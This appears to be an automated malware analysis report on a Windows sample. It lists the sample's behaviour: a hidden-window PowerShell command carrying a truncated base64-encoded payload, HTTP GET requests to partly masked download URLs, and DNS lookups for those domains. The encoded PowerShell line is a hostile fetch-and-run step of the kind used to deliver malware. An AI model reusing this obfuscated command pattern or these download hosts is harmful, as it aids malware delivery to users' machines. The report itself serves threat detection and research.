Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAFcASgBKAEUAdABhAGcAPQAnAEQATwBIAFgARwBnAGoAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwBVAHIAYABJAHQAWQBgAFAAUgBPAFQAbwBgAGMATwBMACIAIAA9AC...
Network activity
TCP
HTTP GET requests
- http://la###e88.com/v7ql/6ru_8itd_e6n4mer/
- http://www.la###e88.com/v7ql/6ru_8itd_e6n4mer/
- http://re####raiteur.com/kqcij/x0uw_3_sd58cj6xl/
- http://ch#####yachtguru.com/site/v3cu_1p9f_0s6a/
- http://sa###iilab.com/old-safariilab/9_k1_jgw/
UDP
- DNS ASK la###e88.com
- DNS ASK so####themes.com
- DNS ASK re####raiteur.com
- DNS ASK bi#.ly
- DNS ASK ch#####yachtguru.com
- DNS ASK sa###iilab.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAFcASgBKAEUAdABhAGcAPQAnAEQATwBIAFgARwBnAGoAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwBVAHIAYABJAHQAWQBgAFAAUgBPAFQAbwBgAGMATwBMACIAIAA9AC...' (with hidden window)
